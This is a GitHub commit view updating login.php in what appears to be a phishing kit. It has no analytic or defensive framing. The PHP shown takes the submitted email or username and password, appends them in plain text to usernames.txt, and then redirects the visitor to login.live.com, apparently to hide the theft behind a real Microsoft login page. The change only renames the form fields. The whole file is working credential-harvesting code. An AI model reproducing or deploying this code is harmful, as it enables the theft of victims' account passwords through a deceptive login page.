Update login.php

This commit is contained in:
Usama Abdul Sattar 2018-06-04 15:52:07 +05:00 committed by GitHub
parent c52ac98fc0
commit 120ba9865a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,6 +1,6 @@
<?php
include 'base.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: http://login.live.com/');
exit();